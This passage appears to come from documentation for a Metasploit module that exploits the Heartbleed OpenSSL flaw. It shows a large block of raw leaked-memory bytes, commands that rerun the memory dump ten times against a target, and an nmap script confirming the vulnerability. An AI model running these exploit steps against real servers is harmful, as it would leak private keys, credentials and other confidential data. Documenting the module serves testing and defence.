<0A>Ѓ<EFBFBD><D083><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"<22>l1v<31>d<EFBFBD><64><EFBFBD><EFBFBD>m<EFBFBD>i^<5E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>y<EFBFBD>}<7D><><EFBFBD><EFBFBD>5<EFBFBD>2<EFBFBD>q<EFBFBD>Upѓ)<29>U D<>)<29>U!<21>]<5D>v%C<><43>#<23><>*<2A>B|c<><63><EFBFBD><EFBFBD><EFBFBD>*\<5C><>3(ic<69>U<EFBFBD><55>{<7B>
K!<21><><EFBFBD>)<29>U!<21><>)<29>U!<21>]<5D>v%C<><43>#<23><>*<2A>B|c
K!<21>B<EFBFBD>)<29>U<EFBFBD><55><EFBFBD><EFBFBD>'<27>U0ؓ)<29>U<EFBFBD>8<EFBFBD>)<29>U0<55><30>)<29>U<EFBFBD>@<40><>)<29>U 9<>)<29>U0<55><30>)<29>U`<60><>)<29>U<EFBFBD><55><EFBFBD>)<29>U<EFBFBD><55><EFBFBD>)<29>U<EFBFBD><55><EFBFBD>)<29>U
G<>eO<65><4F>Pϓ)<29>U     <20>U0v<30>'<27>U<EFBFBD>X<EFBFBD>'<27>U<EFBFBD>X<EFBFBD>'<27>U<EFBFBD>b<EFBFBD>'<27>U<EFBFBD>b<EFBFBD>'<27>U<EFBFBD>b<EFBFBD>'<27>Up<55>'<27>U<EFBFBD>W<EFBFBD>'<27>U<EFBFBD>a<EFBFBD>'<27>q<EFBFBD>'<27>U<EFBFBD>m<EFBFBD>'<27>Uxt<78>'<27>U<EFBFBD><55><EFBFBD><EFBFBD><EFBFBD>Q@<40><>)<29>UA<55><41><EFBFBD><EFBFBD><EFBFBD>w<EFBFBD>ۯ<EFBFBD>H<EFBFBD><48>#
G<>eO<65>IB<49><42><EFBFBD><EFBFBD><EFBFBD>u<EFBFBD>)<29>U<EFBFBD><55>)<29>U@!В<>)<29>U!<21><><EFBFBD>)<29>U  !p<><70>)<29>U  !<21><><EFBFBD>)<29>U<EFBFBD>Ò)<29>U !<21><><EFBFBD>)<29>U  1<>U<EFBFBD><55><EFBFBD>)<29>UQ <20><>)<29>UA<55><41><EFBFBD><EFBFBD>oI,<2C>Щ<EFBFBD><D0A9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>\<5C>ͭ<EFBFBD>r<EFBFBD><72>&<26><>)<29>U@!1<>Y<EFBFBD>"&<26>
                                                                                                                           <20><><EFBFBD><EFBFBD>
                                                                                                                               <20><><EFBFBD><EFBFBD>A<EFBFBD><41>W<EFBFBD><57>GЊ`<60><>)<29>U!Б<>)<29>U<EFBFBD>\7ڊ! <20><>)<29>U<EFBFBD>\7ڊ<37><DA8A><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!<<3C>)<29>U<EFBFBD>\7ڊ  <20>Ò)<29>U<EFBFBD>\7ڊ<37>1p<31><70>)<29>U!@<40><>)<29>U<EFBFBD>\7ڊ`<60><>)<29>U1@<40><>)<29>U0QA<51>Y<EFBFBD>"&<26>
                                                                                     <20><><EFBFBD><EFBFBD>
                                                                                         <20><><EFBFBD><EFBFBD>A<EFBFBD><41>W<EFBFBD><57>GЊ@10<31><30>)<29>Uq0<71><30>)<29>U<EFBFBD><55><EFBFBD>)<29>U<EFBFBD>Rݜ13
1<>ŏmA<6D>,<2C>s<EFBFBD><73><EFBFBD><EFBFBD>)!<21><>9<EFBFBD><39>v-<2D><>B<EFBFBD><42><EFBFBD>Ь<EFBFBD>%<25>o<EFBFBD><6F><EFBFBD>k<EFBFBD>kW<6B>U<EFBFBD>x<EFBFBD><78><EFBFBD>\`Sl<53>]@<40>$W<>F<EFBFBD>k<EFBFBD>a<EFBFBD><61><EFBFBD>j<EFBFBD>x<EFBFBD><78><EFBFBD>0<EFBFBD><30>p<EFBFBD>'<27>N<EFBFBD><4E><EFBFBD>1n<31>}]<5D>[d*9H<39><48><EFBFBD><EFBFBD><EFBFBD>@<40>YVE<56><45><EFBFBD><EFBFBD>'<27><>s<EFBFBD>
           E<>DMV~<7E>,F<>-<2D>y<EFBFBD>m<EFBFBD>C)V)×D>J<><4A><EFBFBD>o<EFBFBD>Ȼ<EFBFBD><C8BB><EFBFBD><EFBFBD>U<EFBFBD><55><EFBFBD>#<23>S<EFBFBD>`E<> ܚ|<7C><><EFBFBD>l<EFBFBD><6C>᨝-<2D>
                                                                    <20>ok{<7B>΄<EFBFBD>C2<43><32>
                                                                               <20>g<EFBFBD><67><EFBFBD>N1A<31><41><EFBFBD><EFBFBD>B/w<><77><EFBFBD><EFBFBD><EFBFBD>)<29>U,<2C>܁<EFBFBD><DC81><EFBFBD>$z<>K

<0A><>
<0A><><EFBFBD><EFBFBD>k<EFBFBD><6B>졽N<ECA1BD>"A<>EV<45><56><EFBFBD><EFBFBD><)<29>HN<48>m[<5B><>s<EFBFBD><73>y<EFBFBD>w<EFBFBD><77>6<EFBFBD><36>2]<5D>Q<EFBFBD><51><EFBFBD>=Mx,f.|E=<3D>,<2C><><EFBFBD><EFBFBD><EFBFBD>n<EFBFBD>D9 h3<68>F<EFBFBD>4<EFBFBD><34><EFBFBD>~n<><6E>
                                                                                  Zd<5A>Z*wc<77>\<5C>l<EFBFBD><6C>`Hԑ<48><D491><EFBFBD>0<EFBFBD><30><EFBFBD>TnzBeժ+e	A<>#AV<41>̗<EFBFBD><CC97>
<0A><><EFBFBD>]v<><76>M<EFBFBD><4D>ɸ<EFBFBD>=<3D><>O@<40><>ʘEf<45>!<21>J3<4A><33>Cvj<76><6A><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[<5B>t.R<><52>c<EFBFBD>{<7B><><EFBFBD>.<2E>cy<63><79>ݵu&$<24>n<EFBFBD>*<2A>!<21><><EFBFBD><EFBFBD>5<EFBFBD>1Њغjx<6A><78>fۢԐ`<60>c<EFBFBD><63><EFBFBD><EFBFBD><EFBFBD>d<EFBFBD>B<EFBFBD>8<EFBFBD>3<EFBFBD>Hn7ȩ՜<C8A9>ku<6B><75><EFBFBD><EFBFBD>i2<69><32>B}o~<7E>/n$ <20><>J<EFBFBD><4A><EFBFBD><EFBFBD><EFBFBD><EFBFBD>bqF<71>B<EFBFBD>v<EFBFBD><76>9IM<49>t'Vu<56><75><EFBFBD><EFBFBD>L5Z
&<26>'<27><>TO (<28>y<EFBFBD><79>
<0A>`<60><>~<7E>Ie:<3A><>cdn<64><6E>]"<22>g<EFBFBD><67><EFBFBD><EFBFBD>}J\plA<6C>FvKkR1:? ٭<>	-<2D>@<40>_<EFBFBD>B<EFBFBD>|<7C><>B<EFBFBD><42>S<EFBFBD><53>f<EFBFBD>cVES]<5D><>V<EFBFBD>^<5E><>Bm<42>
                                                                                  <20>@<40><><EFBFBD>z<EFBFBD><7A><EFBFBD>?_@D~o<>]<5D>
                                                                                                    1
V<><56>WS<57><53>\<5C><><EFBFBD>J<EFBFBD>%<25><><DD88>҅]<5D>%<25>q<EFBFBD><71><EFBFBD>)<29>U1<55><31><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>08R6k<36><6B>C<EFBFBD><43><EFBFBD><EFBFBD>l<EFBFBD>2<EFBFBD>!S<><53>|<7C>G<EFBFBD>j<EFBFBD><6A>G<EFBFBD><47><EFBFBD>><3E>w8q<38>_C<5F><43>9<EFBFBD>
{=o<>n<EFBFBD><6E> <20><>3<EFBFBD>E<EFBFBD>b1p|<7C>%<25>h<EFBFBD><68><EFBFBD><<3C>a:bhj<6A><EF8580>-<2D>6Z<36><5A><EFBFBD>2<EFBFBD>w<EFBFBD><77>!pB<70>)<29>U@<40><>)<29>U!<21>f{<7B><>?<3F>Py0<79><30>\<5C><><EFBFBD><EFBFBD><EFBFBD>,<2C>s/<2F><>ޫ<EFBFBD><DEAB><EFBFBD>5<EFBFBD>ơ<EFBFBD>{*<2A>{<7B>N#W<>"<22><>,<2C>VW<56><57><EFBFBD>a<EFBFBD>#<23><>a9<61>k?b<><62>9濞~<7E><><EFBFBD>e<EFBFBD>^<5E>MQ<4D><51> <20><>n<EFBFBD><6E>w<EFBFBD>x<EFBFBD>Z%1<>ŏmA<6D>,<2C>s<EFBFBD><73>'<27><>s<EFBFBD>
           E<>DMV~<7E>,F<>-<2D>y<EFBFBD>m<EFBFBD>C)V)×D>J<><4A><EFBFBD>o<EFBFBD>Ȼ<EFBFBD><C8BB><EFBFBD><EFBFBD>U<EFBFBD><55><EFBFBD>#<23>S<EFBFBD>`E<> ܚ|<7C><><EFBFBD>l<EFBFBD><6C>᨝-<2D>
                                                                    <20>ok{<7B>΄<EFBFBD>C2<43><32>
                                                                               <20>g<EFBFBD><67><EFBFBD>N1A<31><41><EFBFBD><EFBFBD>B/w<><77>!<21>)<29>U<EFBFBD><55><EFBFBD>)<29>U<EFBFBD>#<23>%<25><>\ <20>rV<72><56><EFBFBD>A#<23><>_
                                                                                                                              <20>m&r<>]<5D>J<EFBFBD>
;<3B><><EFBFBD>/_<><5F>
<0A><><EFBFBD>rD<72><44><EFBFBD>WMZt0<74><30><EFBFBD><><CA9F><EFBFBD><EFBFBD>J<EFBFBD>bB<62>U

|<7C>ƭ<EFBFBD><C6AD><EFBFBD>6<EFBFBD><36><EFBFBD>,s<>d<EFBFBD><64>7<EFBFBD>s<EFBFBD>8$,<2C>I|<7C><>'<27><20>X<EFBFBD><58>j<EFBFBD>%<25><><EFBFBD><EFBFBD>uj}<7D><>Y<EFBFBD>a'<27>Ks<4B><73>V<EFBFBD><56>c.<2E><><EFBFBD>vn:
B<><42><EFBFBD>c<EFBFBD><63>q)GL<47>y0T<30>a&aZ<61>*q/#<23><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)<29><>-<2D><><EFBFBD><EFBFBD>ހYi<59>R3<52>rb)<29><>
<0A><><EFBFBD><EFBFBD><EFBFBD>5E<35><45><EFBFBD><EFBFBD>X?3w`><3E>"<22><>p<EFBFBD><EFBFBD>Φ<EFBFBD><CEA6><EFBFBD><EFBFBD>q<EFBFBD>/<2F>}=9<><39><EFBFBD><EFBFBD>'<27>PuJ<75>]<5D>ȝ?l<>]<5D>cR$<24><><EFBFBD><EFBFBD>-m<><6D><EFBFBD>H,<2C>D^<5E><>Ș{<7B><>5x<35><78>oS<6F><53><EFBFBD>-<2D>ݴ<EFBFBD><DDB4>	<09>:v<><76><EFBFBD>)6<><36>jInld<6C><64>P<EFBFBD>-1<><31>ɾ<EFBFBD>
                                                                                                                         <20><>DyE<79><45><EFBFBD><EFBFBD><EFBFBD>l<EFBFBD>"<22><>e<EFBFBD>#<23><>Ǽ<EFBFBD><C7BC><EFBFBD>-<KN<4B>{<7B><<3C>T<EFBFBD><54><EFBFBD><EFBFBD><EFBFBD>&<26><><EFBFBD>E<EFBFBD>:Y<><59>D<EFBFBD><44><EFBFBD><EFBFBD>ʎ<EFBFBD><CA8E><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>c#<23>I<EFBFBD><49>h5<<3C>-<2D>y<EFBFBD>ұ<EFBFBD>ST$m<><6D>U<EFBFBD>8||<7C>j<EFBFBD>S.ϖ<><CF96><EFBFBD>W<EFBFBD>~d<><64>j<EFBFBD><6A>訦Dx<44>&<26>օ<EFBFBD><D685>U<EFBFBD><55><EFBFBD>Gj<47><6A>b'<27>0<EFBFBD><30>h<EFBFBD>р.:<3A>W<EFBFBD><57><EFBFBD><EFBFBD>a<EFBFBD><61><EFBFBD>p<EFBFBD>X'<27>X<EFBFBD><58>N7es<65><73><EFBFBD><EFBFBD>C'<27>ɒ$(<28>bM<62><4D>܍<EFBFBD>Rݜ13
1<>ŏmA<6D>,<2C>s<EFBFBD><73><EFBFBD><EFBFBD>)!<21><>9<EFBFBD><39>v-<2D><>B<EFBFBD><42><EFBFBD>Ь<EFBFBD>%<25>o<EFBFBD><6F><EFBFBD>k<EFBFBD>kW<6B>U<EFBFBD>x<EFBFBD><78><EFBFBD>\`Sl<53>]@<40>$W<>F<EFBFBD>k<EFBFBD>a<EFBFBD><61><EFBFBD>j<EFBFBD>x<EFBFBD><78><EFBFBD>0<EFBFBD><30>p<EFBFBD>'<27>N<EFBFBD><4E><EFBFBD>1n<31>}]<5D>[d*9H<39><48><EFBFBD><EFBFBD><EFBFBD>@<40>YVE<56><45><EFBFBD><EFBFBD>'<27><>s<EFBFBD>
           E<>DMV~<7E>,F<>-<2D>y<EFBFBD>m<EFBFBD>C)V)×D>J<><4A><EFBFBD>o<EFBFBD>Ȼ<EFBFBD><C8BB><EFBFBD><EFBFBD>U<EFBFBD><55><EFBFBD>#<23>S<EFBFBD>`E<> ܚ|<7C><><EFBFBD>l<EFBFBD><6C>᨝-<2D>
                                                                    <20>ok{<7B>΄<EFBFBD>C2<43><32>
                                                                               <20>g<EFBFBD><67><EFBFBD>N1A<31><41><EFBFBD><EFBFBD>B/w<><77>q<EFBFBD><71>)<29>U!<21>Ɠ)<29>U<EFBFBD><55><EFBFBD>)<29>``<60><>)<29>U<EFBFBD>@ɓ)<29>U!<21><>)<29>U<EFBFBD><55><EFBFBD>B/w<><77>!@<40><>)<29>U!@<40><>)<29>U<EFBFBD><55><EFBFBD>B/w<><77>1<EFBFBD><31>5E<35><45><EFBFBD><EFBFBD>X?3w`><3E>"<22><>p<EFBFBD><EFBFBD>Φ<EFBFBD><CEA6><EFBFBD><EFBFBD>q<EFBFBD>/<2F>}=9<><39><EFBFBD><EFBFBD>'<27>PuJ<75>]<5D>ȝ?l<>]<5D>cR$<24><><EFBFBD><EFBFBD>-m<><6D><EFBFBD>H,<2C>D^<5E><>Ș{<7B><>5x<35><78>oS<6F><53><EFBFBD>-<2D>ݴq<DDB4><71><EFBFBD>)<29>U!<21><>)<29>U<EFBFBD><55>8NE<<3C><><EFBFBD>GGΡ<47><CEA1>)L<><4C>ңf<D2A3>(+c<><63><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'B<uΓU<CE93>PiS6<53>K<EFBFBD><4B>tgF<67>Z
              <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<0A>`dXQ4<51><34>
<0A>m<EFBFBD>Q<EFBFBD>J<EFBFBD>G<EFBFBD>R<EFBFBD>(<28><>w<EFBFBD>!?e<><65>1<EFBFBD><31>J<EFBFBD>On<4F><6E>}<7D>v@é<><C3A9><EFBFBD>eW8<57>N<EFBFBD><4E><EFBFBD>p3<70>)<29>U A<><41><EFBFBD>)<29>U  <20><><EFBFBD>@'<27>/!<21>]7ڊ!<21>\7ڊ<<3C>)<29>U 0<><30><EFBFBD>)<29>U1<55><31><EFBFBD>)<29>U1<55><31>)<29>UAǕ)<29>U 1<>\7ڊ<37>\7ڊ0 <20>\7ڊ!<21>)<29>U!<21>9<EFBFBD>)!<21><>)<29>U!@<<3C>)<29>U !`;<3B>)<29>U!0ӓ)1Q%c<><63>ʹ<EFBFBD><CAB9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!kaliUn<55>R<EFBFBD>0h<30>"!ĝ<><C49D><EFBFBD>jfx<66><78>&<26><><EFBFBD>~<7E>!<21>\7ڊ!ĝ<><C49D><EFBFBD>jfx<66><78>&<26><><EFBFBD>~<7E>1<EFBFBD><31><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>1<EFBFBD><31><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>1
V<><56>WS<57><53>\<5C><><EFBFBD>J<EFBFBD>%<25><><DD88>҅]<5D>%<25>q<EFBFBD>A`<60><>'<27>Uѓ)<29>U<EFBFBD>ջ'<27>UA<55><41>'<27>U<EFBFBD><55>)<29>U<EFBFBD>ջ'<27>UAP<41><50>)<29>U<EFBFBD>ד)<29>U0<55><30>)<29>Ua1<61><31><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ĕ)<29>U<EFBFBD>`p<>0<EFBFBD><>L<EFBFBD><4C><EFBFBD>f<EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD>^<5E>=<3D>6<EFBFBD><36>=<3D>q<EFBFBD>nw<6E>9<EFBFBD><39>0D}<7D>ci<63><69>t<EFBFBD><74><EFBFBD>G=<3D>x<EFBFBD><78><EFBFBD><EFBFBD>сFAp<41>0<EFBFBD>:%6<>Gh<47>F(<28><>U<EFBFBD>TDw'<27><>le<6C>G<EFBFBD>`}<7D><>9-<2D><><EFBFBD><EFBFBD>Z<EFBFBD>Qe"<22>C)kUݠ<55>e6t7<74><37><EFBFBD>6<EFBFBD>u)<29><>1<EFBFBD><31><EFBFBD><EFBFBD><EFBFBD>
mL<6D>n<EFBFBD>*<2A>]`<60><><EFBFBD><EFBFBD>D<EFBFBD>>a<><61><EFBFBD>K<EFBFBD>@V|<7C><><EFBFBD><EFBFBD>q<EFBFBD>'<27>UHn<48>'<27>U<EFBFBD>v<EFBFBD>'<27>U0v<30>'<27>U<EFBFBD>X<EFBFBD>'<27>U<EFBFBD>X<EFBFBD>'<27>U<EFBFBD>b<EFBFBD>'<27>U<EFBFBD>b<EFBFBD>'<27>U<EFBFBD>b<EFBFBD>'<27>Up<55>'<27>U<EFBFBD>W<EFBFBD>'<27>U<EFBFBD>a<EFBFBD>'<27>q<EFBFBD>'<27>U<EFBFBD>m<EFBFBD>'<27>Uxt<78>'<27>U t<>'<27>UxS<78>'<27>UpR<70>'<27>UPo<50>'<27>U<EFBFBD>k<EFBFBD>'<27>UXO<58>'<27>U`q<>'<27>U<EFBFBD>m<EFBFBD>'<27>U<EFBFBD>u<EFBFBD>'<27>U(u<>'<27>U<EFBFBD>V<EFBFBD>'<27>U<EFBFBD>V<EFBFBD>'<27>U`f<>'<27>f<EFBFBD>'<27>U]<5D>'<27>U<EFBFBD>\<5C>'<27>U<EFBFBD>o<EFBFBD>'<27>U8l<38>'<27>U<EFBFBD>U<EFBFBD>'<27>Ue<55>'<27>U<EFBFBD>[<5B>'<27>U<EFBFBD>p<EFBFBD>'<27>U@m<>'<27>U<EFBFBD>n<EFBFBD>'<27>U<EFBFBD>k<EFBFBD>'<27>U<EFBFBD>M<EFBFBD>'<27>UHM<48>'<27>U S<>'<27>UR<55>'<27>UO<55>'<27>U<EFBFBD>R<EFBFBD>'<27>U<EFBFBD>Q<EFBFBD>'<27>U<EFBFBD>N<EFBFBD>'<27>U<EFBFBD>M<EFBFBD>'<27>U<EFBFBD>L<EFBFBD>'<27>UA<55><41><EFBFBD>)<29>UA<55>@a7ڊ@a7ڊ@Ǖ)<29>U@Ǖ)<29>U<EFBFBD><55>W<EFBFBD><57>(E <20><>
[&(yu0<75>.<2E><><EFBFBD>I<EFBFBD>V<EFBFBD><56><EFBFBD>t<EFBFBD>1<EFBFBD><31>fE<66>I̮N;<3B><><70>]<5D>2<EFBFBD>&^}        <20><> #<23><><EFBFBD><EFBFBD>Ƃ<EFBFBD>T<EFBFBD>|i2<69>&~<<3C>Q;T<>B<EFBFBD>TAﴕ:<3A>/<2F><>H<EFBFBD>^W<><57>x<EFBFBD><78><EFBFBD><EFBFBD><EFBFBD>]͓!<21><><EFBFBD>]<5D>O<EFBFBD><4F>bC<62><43>Z<EFBFBD>A<EFBFBD>gw<67><77>it<69><74>Zy

The contents of /etc/hosts is visible in this file, as it was edited to prevent the gethostbyname failure issue previously noted.

Utilizing repeat

Because arbitrary memory is dumped, a high volume application that uses openSSL will cycle potentially valuable data fairly often. The repeat command can be used to execute the module multiple times.

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222
rhosts => 222.222.2.222
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -n 10 run

[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Confirming using NMAP

Utilizing the ssl-heartbleed script, we can replicate the SCAN action.

# nmap -p 44330 --script ssl-heartbleed 222.222.2.222
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 17:52 EDT
Nmap scan report for ubuntu1804.romain (222.222.2.222)
Host is up (0.0017s latency).

PORT      STATE SERVICE
44330/tcp open  unknown
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://cvedetails.com/cve/2014-0160/
|_      http://www.openssl.org/news/secadv_20140407.txt
MAC Address: 00:0C:29:AA:AA:AA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds